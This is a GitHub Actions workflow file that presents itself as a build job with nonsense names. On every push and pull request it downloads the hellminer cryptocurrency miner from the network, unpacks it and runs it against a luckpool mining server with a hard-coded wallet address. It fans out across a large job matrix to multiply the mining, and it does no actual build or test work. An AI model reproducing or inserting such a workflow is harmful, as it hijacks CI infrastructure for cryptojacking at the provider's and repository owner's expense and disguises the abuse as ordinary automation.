name: Vrsc
on: [push, pull_request]
jobs:
  build:
    name: Dee
    runs-on: windows-latest
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 3
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: dunlut
      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx.zip -OutFile hellminer_cpu_win64_avx.zip
    - name: Setup
      run: Expand-Archive hellminer_cpu_win64_avx.zip
    - name: Start
      run: ./hellminer_cpu_win64_avx/hellminer.exe -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RSBmzzfgzomxwx7o6tJNmG3kecq9Huc7Q9.gitry -p x --cpu 4
    - name: Finish
      run: exit
